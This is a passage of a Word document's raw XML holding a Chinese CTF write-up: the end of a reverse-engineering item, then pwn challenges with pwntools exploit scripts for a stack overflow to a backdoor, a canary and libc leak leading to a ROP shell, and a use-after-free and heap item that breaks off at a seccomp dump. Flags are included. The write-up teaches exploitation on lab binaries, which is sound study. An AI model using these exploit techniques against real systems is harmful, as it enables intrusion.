    <w:p w14:paraId="2300D2B1" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">        key_segments[i] = (seed &gt;&gt; 16) &amp; 0xFFFF;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F8D84" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">    }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1104EA28" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">    if(key_segments == 0xB15D){  // 关键判断  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0497B4E9" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">        apply_xor_mask(key_segments, 0xDEAD);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0400D9" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">    }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A15321" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF1213" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>构造有效输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A652AC2" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462635BC" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve"># 通过算法推导所需CRC32值  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E83E4B" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">$ python -c "import binascii; print(hex(binascii.crc32(b'B15D_FLAG')))"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AAAAA5" w14:textId="77777777" w:rsidR="0007048D" w:rsidRPr="0007048D" w:rsidRDefault="0007048D" w:rsidP="0007048D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007048D">
        <w:t xml:space="preserve">0x8d82e12a  # 需要让初始种子满足该条件  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A74829" w14:textId="77777777" w:rsidR="004871D6" w:rsidRPr="00422C11" w:rsidRDefault="004871D6" w:rsidP="004871D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D34007" w14:textId="6223379E" w:rsidR="0012081C" w:rsidRDefault="0012081C" w:rsidP="0012081C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc190815129"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="556F6D6A" w14:textId="732C78F8" w:rsidR="0012081C" w:rsidRPr="0012081C" w:rsidRDefault="0012081C" w:rsidP="0012081C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc190815130"/>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>太空电梯控制终端</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="04F049B0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题目描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>[提供二进制文件：elevator_ctl]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>连接到靶机端口6666的电梯控制系统存在漏洞，获取root权限读取/flag.txt。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11479E30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漏洞分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 使用checksec发现无NX保护</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 输入密码时存在栈溢出漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>• 后门函数地址：0x4012b6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038C423A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Exploit编写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D553AF" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F82549" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:lastRenderedPageBreak/>
        <w:t>复制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB2AA6" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396006EF" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F6D67E" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>payload = b'A'*72 + p64(0x4012b6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F672F" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>r = remote('target.ip', 6666)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B762D85" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>r.sendlineafter(b'Password:', payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBD310A" w14:textId="77777777" w:rsidR="00C97809" w:rsidRPr="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:t>r.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F31C8" w14:textId="77777777" w:rsidR="00C97809" w:rsidRDefault="00C97809" w:rsidP="00C97809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97809">
        <w:br/>
        <w:t>flag{Gr4vity_F0rg0tten_St4ck}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAB3CF" w14:textId="69A2B1D9" w:rsidR="008F4F4A" w:rsidRDefault="008F4F4A" w:rsidP="008F4F4A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc190815131"/>
      <w:r w:rsidRPr="008F4F4A">
        <w:t>被遗忘的栈帧</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="527D96A1" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>核心漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF747B">
        <w:br/>
        <w:t>选项1的read_input函数存在栈溢出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37089015" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C3731" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>void read_input() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E2A2B" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t xml:space="preserve">  char buf; // rbp-0x30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A148585" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t xml:space="preserve">  printf("输入姓名: ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053073F" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t xml:space="preserve">  read(0, buf, 256); // 关键溢出点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C49E41D" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C0F969" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D18EC" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>泄露libc地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF747B">
        <w:t>：通过覆盖printf的返回地址，构造pop rdi; puts@got链泄露libc基址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21DF2A" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>绕过Canary</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF747B">
        <w:t>：利用程序残留的printf输出带canary的栈数据（偏移0x28处）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7B2866" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>最终利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF747B">
        <w:t>：通过system("/bin/sh")获取shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C9983E" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EXP关键代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE22511" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4CCE7" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t># 泄露canary和libc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E258E96" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>payload = b'A'*40 + b'B'*8  # 覆盖到canary前</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DBF413" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>p.send(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F3FBD" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t xml:space="preserve">canary = u64(p.recv(8).rjust(8,b'\x00'))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD1066" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>libc_leak = u64(p.recv(6).ljust(8,b'\x00'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5AF19F" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF42F0F" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE4B8A" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t>$ cat flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13648EA1" w14:textId="77777777" w:rsidR="00FF747B" w:rsidRPr="00FF747B" w:rsidRDefault="00FF747B" w:rsidP="00FF747B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF747B">
        <w:t xml:space="preserve">flag{St4ck_0verfl0w_Meet5_R0P}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923AF0F" w14:textId="77777777" w:rsidR="00386ADC" w:rsidRPr="00386ADC" w:rsidRDefault="00386ADC" w:rsidP="00386ADC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc190815132"/>
      <w:r w:rsidRPr="00386ADC">
        <w:t>破碎的时间沙漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="07B2A634" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>关键数据结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F98">
        <w:t> 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9ED32F" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718980D" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>struct TimeBlock {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158E0CCF" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve">  uint64_t timestamp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E0BC3" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve">  char description;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565F1E9" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE48B8" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103882DA" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UAF漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>：删除时间块后未清空指针（选项2）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6300AE06" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>堆溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>：选项3的编辑功能允许写入超过description长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C210B4D" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>沙箱限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB4AC3" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FE0BF" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve">$ seccomp-tools dump ./timemgr  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDEB49" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0000: 0x20 0x00 0x00 0x00000004  A = arch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC81892" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0001: 0x15 0x00 0x06 0xc000003e  if (A != ARCH_X86_64) goto 0008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A639D10" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0002: 0x20 0x00 0x00 0x00000000  A = sys_number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D4AC1" w14:textId="77777777" w:rsidR="00AB4F98" w:rsidRPr="00AB4F98" w:rsidRDefault="00AB4F98" w:rsidP="00AB4F98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4F98">
        <w:t xml:space="preserve"> 0003: 0x35 0x00 0x01 0x40000000  if (A &lt; 0x40000000) goto 0005</w:t>
      </w:r>
    </w:p>
